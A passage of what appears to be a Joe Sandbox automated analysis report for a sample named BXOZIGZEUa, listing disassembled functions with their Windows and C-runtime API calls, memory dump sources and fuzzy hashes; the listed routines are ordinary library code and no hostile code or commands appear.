                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CompatibleCreate$H_prolog3
                                                              • String ID:
                                                              • API String ID: 2193723985-0
                                                              • Opcode ID: ac828f6884778756816aa1e756418d68c0f2a18b8f8236347b87c42be1dcd776
                                                              • Instruction ID: ac9028301b84d1e0c08523c58d0ada0e8d9167ade2b7cad2edb48a32b99e2012
                                                              • Opcode Fuzzy Hash: ac828f6884778756816aa1e756418d68c0f2a18b8f8236347b87c42be1dcd776
                                                              • Instruction Fuzzy Hash: E451CDB09217258FCB44DF29C58129A7FA5BF09B00F1081AFEC49DF25ADBB48545CF95
                                                              APIs
                                                                • Part of subcall function 004D5200: std::_Lockit::_Lockit.LIBCPMT ref: 004D5211
                                                                • Part of subcall function 004D67F0: std::_Lockit::_Lockit.LIBCPMT ref: 004D681D
                                                                • Part of subcall function 004D67F0: std::_Lockit::_Lockit.LIBCPMT ref: 004D6840
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D41A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: LockitLockit::_std::_
                                                              • String ID: .\uninstall.log
                                                              • API String ID: 3382485803-3792079071
                                                              • Opcode ID: d805373eabe661b02126e2ed3a6f3d4ae1036338666cb37bb4ba8376c14a689b
                                                              • Instruction ID: 0cc5a9d52f6be4365506c42b7d70efb97af8c8b2b93cfc6fbd21dc9ef2d1a0ee
                                                              • Opcode Fuzzy Hash: d805373eabe661b02126e2ed3a6f3d4ae1036338666cb37bb4ba8376c14a689b
                                                              • Instruction Fuzzy Hash: 9F21FB71B40615ABC710DF29DC52B5EB7A4FB85724F10032BF829E77C0DB39A904C695
                                                              APIs
                                                                • Part of subcall function 004DACC7: __CxxThrowException@8.LIBCMT ref: 004DACDD
                                                              • _memmove_s.LIBCMT ref: 004D8CDA
                                                                • Part of subcall function 004D8C10: _memcpy_s.LIBCMT ref: 004D8CE7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw_memcpy_s_memmove_s
                                                              • String ID:
                                                              • API String ID: 1845472808-0
                                                              • Opcode ID: 5879b019c18efdeebd3e6a91d46a76811754c6cbb10e6172916d71fe858b583b
                                                              • Instruction ID: 1a91fb1cc1230f90c7c51f8663fae014e1ba08a24a09f07f6c3e84337d049c28
                                                              • Opcode Fuzzy Hash: 5879b019c18efdeebd3e6a91d46a76811754c6cbb10e6172916d71fe858b583b
                                                              • Instruction Fuzzy Hash: 2D31C731611504DFC700DF69C8A9D3AF3A9EF94714B10855FF9089B311DE39BD508BA8
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004DF2C8
                                                              • RtlReleaseActivationContext.NTDLL(?,00000004,004DF3DB), ref: 004DF34C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ActivationContextH_prolog3Release
                                                              • String ID:
                                                              • API String ID: 1979592854-0
                                                              • Opcode ID: a0322850799cc5f053977acf071f6c5b481a21e353f13c9be7d4136faf6d551e
                                                              • Instruction ID: b112fc12682a034cdfc5436cfe8e8ce0948f78d8c138782ef961febae7ad9a0f
                                                              • Opcode Fuzzy Hash: a0322850799cc5f053977acf071f6c5b481a21e353f13c9be7d4136faf6d551e
                                                              • Instruction Fuzzy Hash: 63211934201A018FDB29DF79C4A8E2AB7F0BF89715715456EE5A3CB770CB34A805DB14
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2D3
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,004D106C,00000000), ref: 004DA2DB
                                                                • Part of subcall function 004DF00F: GetModuleFileNameW.KERNEL32(?,?,00000105,?,?), ref: 004DF042
                                                                • Part of subcall function 004DF00F: SetLastError.KERNEL32(0000006F,?,?), ref: 004DF059
                                                                • Part of subcall function 004DA0E9: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,00000000), ref: 004DA126
                                                                • Part of subcall function 004DA0E9: PathFindExtensionW.SHLWAPI(?,?,?,00000000), ref: 004DA140
                                                                • Part of subcall function 004DA0E9: __wcsdup.LIBCMT ref: 004DA18A
                                                                • Part of subcall function 004DA0E9: __wcsdup.LIBCMT ref: 004DA1C8
                                                                • Part of subcall function 004DA0E9: __wcsdup.LIBCMT ref: 004DA1FC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Error__wcsdup$FileModeModuleName$ExtensionFindLastPath
                                                              • String ID:
                                                              • API String ID: 972848482-0
                                                              • Opcode ID: 5a85b10c31fd73e421d363392806007da4aa839ac4eb3270293196bb009c4ef6
                                                              • Instruction ID: 0292819e10ddf56fed2c231c15b371635e9b2a078b4fae245a30b8457694314f
                                                              • Opcode Fuzzy Hash: 5a85b10c31fd73e421d363392806007da4aa839ac4eb3270293196bb009c4ef6
                                                              • Instruction Fuzzy Hash: FAF0AF70A102544FCB60FF66D415B6D3B98AF04718B05406FF8098B362CB78D800DBAA
                                                              APIs
                                                                • Part of subcall function 005CE629: __getptd_noexit.LIBCMT ref: 005CE629
                                                              • __lock_file.LIBCMT ref: 005CE0A2
                                                                • Part of subcall function 005CD549: __lock.LIBCMT ref: 005CD56E
                                                              • __fclose_nolock.LIBCMT ref: 005CE0AD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 4596504745a05e8c60ad50d7fdd233d98f68db55239c8cd96ba9a418a20567c7
                                                              • Instruction ID: 1f5179374e0055c7f649358b6b4c36612a780e4f233a29b32494cb38d46ba3d2
                                                              • Opcode Fuzzy Hash: 4596504745a05e8c60ad50d7fdd233d98f68db55239c8cd96ba9a418a20567c7
                                                              • Instruction Fuzzy Hash: 2EF06D718117069ED720ABF9E80FF6E7EA07F80334F24821DE421AA1D1C7B88A019F95
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004E0438
                                                              • GetWindowDC.USER32(00000000,00000004,004DE19D,00000000,?,?,00605254), ref: 004E0464
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Window
                                                              • String ID:
                                                              • API String ID: 616115145-0
                                                              • Opcode ID: caf85769d0406cc3cf12370513d10d36bc3d93aa40144fd43e601baff3f9f825
                                                              • Instruction ID: 76ac9565a3216892e42dcc8ed089604dac01079e8c37063cdfac7b63601f934d
                                                              • Opcode Fuzzy Hash: caf85769d0406cc3cf12370513d10d36bc3d93aa40144fd43e601baff3f9f825
                                                              • Instruction Fuzzy Hash: 6FF012B06007058FCB64EF79C50572B7AE0FF48705710482EA59AC7741EB749940CB59
                                                              APIs
                                                              • ActivateActCtx.KERNEL32(?,?,0062BB48,00000010,004D95B9,KERNEL32.DLL), ref: 004D9504
                                                              • LoadLibraryW.KERNELBASE(?), ref: 004D951B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ActivateLibraryLoad
                                                              • String ID:
                                                              • API String ID: 389599620-0
                                                              • Opcode ID: c5b020f090ac0eda3bb536ea9c65b0016f663521bf267c18a33a725ea44678c9
                                                              • Instruction ID: 04ead399604285edddff4cfb0e19d51d2754a19bbc855dd540cd7fbf84378971
                                                              • Opcode Fuzzy Hash: c5b020f090ac0eda3bb536ea9c65b0016f663521bf267c18a33a725ea44678c9
                                                              • Instruction Fuzzy Hash: 35F0FE72D00219EECF11AFA1EC15AAEBB71BB48750F504537F415E2261CB788902DB54
                                                              APIs
                                                              • ___crtCorExitProcess.LIBCMT ref: 005CEB93
                                                                • Part of subcall function 005CEB60: GetModuleHandleW.KERNEL32(mscoree.dll,?,005CEB98,?,?,005CE4E0,000000FF,0000001E,00000001,00000000,00000000,?,005D4298,?,00000001,?), ref: 005CEB6A
                                                                • Part of subcall function 005CEB60: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005CEB7A
                                                              • ExitProcess.KERNEL32 ref: 005CEB9C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                              • String ID:
                                                              • API String ID: 2427264223-0
                                                              • Opcode ID: ede82fc9f2dc32d7ee0dbb6e4cfeabfc2d2a7f68a231f17c0d85d22b8421eb46
                                                              • Instruction ID: abb550e648f77b64784437f22d1a9ee73421d5b19aa1cf19c069057ce1241acd
                                                              • Opcode Fuzzy Hash: ede82fc9f2dc32d7ee0dbb6e4cfeabfc2d2a7f68a231f17c0d85d22b8421eb46
                                                              • Instruction Fuzzy Hash: 72B04831000509BB8B152B62DC0AC693E2AEA816A0B104424B80949021DE72AD92AA88
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _memcpy_s
                                                              • String ID:
                                                              • API String ID: 2001391462-0
                                                              • Opcode ID: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
                                                              • Instruction ID: 02fee1a429d4c1d7992f827e6cb1385e71ba5271b356a0b577d65ed26759fe7c
                                                              • Opcode Fuzzy Hash: 360983abc963d180cc33d66c654b976c084fbdc2e506759bc210f0887cbecbba
                                                              • Instruction Fuzzy Hash: 82118C76600A05AFC309DF6CC891CAAB7B9FF8931071586AEE5598B351EB31ED01CBD4
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004E1639
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID:
                                                              • API String ID: 2489616738-0
                                                              • Opcode ID: 71ddd5cae70d2240d987bc81d6097924373af9f77836be75a9a1d69462517b05
                                                              • Instruction ID: 93887290a795610aabd668e7634644a67f87a1fdb77e2abef007835c29c1317c
                                                              • Opcode Fuzzy Hash: 71ddd5cae70d2240d987bc81d6097924373af9f77836be75a9a1d69462517b05
                                                              • Instruction Fuzzy Hash: AF0175746401839FDB25AF768812B6A76E3BB50366B19102EE4518B3A1DF38CD40CB58
                                                              APIs
                                                              • __wcsicoll.LIBCMT ref: 004DE738
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Exception@8H_prolog3Throw__wcsicoll
                                                              • String ID:
                                                              • API String ID: 1238845444-0
                                                              • Opcode ID: 4c228a33c86e400e95433e714d426b2f606b709a90dffcd125c608e2ef0bd758
                                                              • Instruction ID: a682091c10014ee7efd0c88a3c678a1dd5c5180eae1c6cc14efa7ad2936c0a02
                                                              • Opcode Fuzzy Hash: 4c228a33c86e400e95433e714d426b2f606b709a90dffcd125c608e2ef0bd758
                                                              • Instruction Fuzzy Hash: F9E0ED3220011867CB14AE29DC61AEB3B949F00764F00022BF906963E2DE34DD5092D9
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,00000006,00000104,004DA1B8,?,004DADE8,?,?,?,00000000,?,004DA1B8,0000E000,?,00000100), ref: 004D8798
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FindResource
                                                              • String ID:
                                                              • API String ID: 1635176832-0
                                                              • Opcode ID: c7f6c632ef019728501bdcf8b22a072b5780ee46a39435a3236e7675570e60eb
                                                              • Instruction ID: 044f81cc4472e3c559470a393b462032e09b1b092f960de5cdea22a412ce8c33
                                                              • Opcode Fuzzy Hash: c7f6c632ef019728501bdcf8b22a072b5780ee46a39435a3236e7675570e60eb
                                                              • Instruction Fuzzy Hash: 2FE0C22630002837D9101A4EBC45DBB779CDBD2BBAB00403BFD4DEB300DA69E812A2F0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _malloc
                                                              • String ID:
                                                              • API String ID: 1579825452-0
                                                              • Opcode ID: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
                                                              • Instruction ID: 095892ce32c3148df2870fddd657fc131e9c1b01d871b4b0f48db73491300081
                                                              • Opcode Fuzzy Hash: fe189ec788af057dcd4b1ff232a28fefe3e0e8550917db351e345314bec743c0
                                                              • Instruction Fuzzy Hash: B2E09273500616AFC7009F49D454B86FBDCEF91370F16C4ABE804CB352C6B9E8148BA4
                                                              APIs
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,004D1C42,?,00000000,*.*,00000003,?,00000001,9E026D90,?,?,00000000), ref: 004DB3EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FileFindNext
                                                              • String ID:
                                                              • API String ID: 2029273394-0
                                                              • Opcode ID: 89eaa9c468673b38799d15aba3f7b34eb81b1f63c499f78dd5476c1359cdef71
                                                              • Instruction ID: 74dc8af17251732f28c92a8fa03db88b084ad6c35109fdc364dd42992348c856
                                                              • Opcode Fuzzy Hash: 89eaa9c468673b38799d15aba3f7b34eb81b1f63c499f78dd5476c1359cdef71
                                                              • Instruction Fuzzy Hash: 3DE06D31500B00DFD7208B19F944A63B7E0EB88B20F01C82FE4AEC3B50D774A840CA44
                                                              APIs
                                                                • Part of subcall function 004EE769: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004EE79C
                                                                • Part of subcall function 004EE769: _memset.LIBCMT ref: 004EE7B5
                                                              • SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 004DD0C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressInfoParametersProcSystem_memset
                                                              • String ID:
                                                              • API String ID: 831922234-0
                                                              • Opcode ID: 4e7b465c8909834e5e339d539f504f1327f3888806d0ca459d43ca38b7b09784
                                                              • Instruction ID: 1ada6c14db09ce3f0d668f37b489010468856bf91a709e2e515944c36bb59b88
                                                              • Opcode Fuzzy Hash: 4e7b465c8909834e5e339d539f504f1327f3888806d0ca459d43ca38b7b09784
